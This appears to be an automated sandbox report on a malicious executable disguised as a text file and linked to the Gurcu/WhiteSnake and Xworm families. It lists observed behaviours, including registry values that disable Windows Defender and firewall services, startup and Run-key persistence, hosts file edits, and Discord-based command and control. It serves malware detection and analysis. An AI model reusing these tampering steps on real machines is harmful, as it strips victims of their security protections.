Analysis Overview
SHA256
159c1154b8553b15f7feebbb129b1a69ce1f24dea85e2837ad84160e1ce6dc5c
Threat Level: Known bad
The file READ ME BEFOR OPEN.txt.exe was found to be: Known bad.
Malicious Activity Summary
Contains code to disable Windows Defender
Modifies security service
Modifies Windows Defender DisableAntiSpyware settings
Disables service(s)
Gurcu, WhiteSnake
Xworm
Gurcu family
Xworm family
Detect Xworm Payload
Modifies boot configuration data using bcdedit
Manipulates Digital Signatures
Modifies Windows Firewall
Possible privilege escalation attempt
Disables RegEdit via registry modification
Sets file to hidden
Stops running service(s)
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Disables Task Manager via registry modification
Modifies file permissions
Executes dropped EXE
Drops startup file
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Power Settings
Legitimate hosting services abused for malware hosting/C2
Network Share Discovery
Adds Run key to start application
Sets desktop wallpaper using registry
Drops file in System32 directory
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
Browser Information Discovery
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Unsigned PE
Modifies registry class
Scheduled Task/Job: Scheduled Task
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: GetForegroundWindowSpam
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Checks SCSI registry key(s)
Enumerates system info in registry
Suspicious use of SetWindowsHookEx
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Runs net.exe
Suspicious behavior: LoadsDriver
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Delays execution with timeout.exe
Views/modifies file attributes
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-20 18:46
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-20 18:46
Reported
2025-03-20 19:05
Platform
win11-20250314-de
Max time kernel
900s
Max time network
491s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Disables service(s)
Gurcu family
Gurcu, WhiteSnake
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Xworm
Xworm family
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Command and Scripting Interpreter: PowerShell
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\cmd.exe | N/A |
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible privilege escalation attempt
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
Stops running service(s)
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Windows Host Service.scr | N/A |
| N/A | N/A | N/A | N/A |
Modifies file permissions
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr" | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\"" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\"" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Realtek Audio Driver Host\\$77RealtekAudioDriverHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Network Share Discovery
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\perfc00A.dat | N/A | N/A |
| File opened for modification | C:\Windows\System32\Rasauq\$77RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Rasauq\$77RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\System32\$666-RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\perfc007.dat | N/A | N/A |
| File created | C:\Windows\system32\perfh009.dat | N/A | N/A |
| File created | C:\Windows\system32\perfh00A.dat | N/A | N/A |
| File created | C:\Windows\system32\perfc010.dat | N/A | N/A |
| File opened for modification | C:\Windows\System32\$666-RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\wbem\Performance\WmiApRpl_new.h | N/A | N/A |
| File created | C:\Windows\system32\perfh010.dat | N/A | N/A |
| File created | C:\Windows\system32\perfh011.dat | N/A | N/A |
| File opened for modification | C:\Windows\system32\PerfStringBackup.INI | N/A | N/A |
| File created | C:\Windows\system32\perfc00C.dat | N/A | N/A |
| File created | C:\Windows\system32\perfh00C.dat | N/A | N/A |
| File created | C:\Windows\system32\perfc011.dat | N/A | N/A |
| File created | C:\Windows\system32\PerfStringBackup.TMP | N/A | N/A |
| File created | C:\Windows\system32\perfc009.dat | N/A | N/A |
| File created | C:\Windows\System32\Rasauq\$77RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery\ReAgent.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\System32\$666-RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini | N/A | N/A |
| File created | C:\Windows\system32\perfh007.dat | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png" | C:\Windows\system32\reg.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\INF\netrtl64.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\compositebus.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\audioendpoint.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\printqueue.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\disk.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\swenum.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\rdpbus.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\INF\monitor.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\umbus.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\usbport.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\vhdmp.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | N/A | N/A |
| File opened for modification | C:\Windows\INF\c_swdevice.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\hdaudio.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\keyboard.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\INF\cdrom.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\vdrvroot.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\input.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\volume.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\kdnic.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\acpi.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File created | C:\Windows\inf\WmiApRpl\WmiApRpl.h | N/A | N/A |
| File opened for modification | C:\Windows\inf\WmiApRpl\WmiApRpl.ini | N/A | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\INF\volmgr.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\pci.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\mshdc.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\msmouse.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\inf\WmiApRpl\WmiApRpl.h | N/A | N/A |
| File opened for modification | C:\Windows\INF\hdaudbus.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\INF\spaceport.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\cpu.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File opened for modification | C:\Windows\INF\mssmbios.PNF | C:\Windows\system32\powercfg.exe | N/A |
| File created | C:\Windows\inf\WmiApRpl\WmiApRpl.ini | N/A | N/A |
Launches sc.exe
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
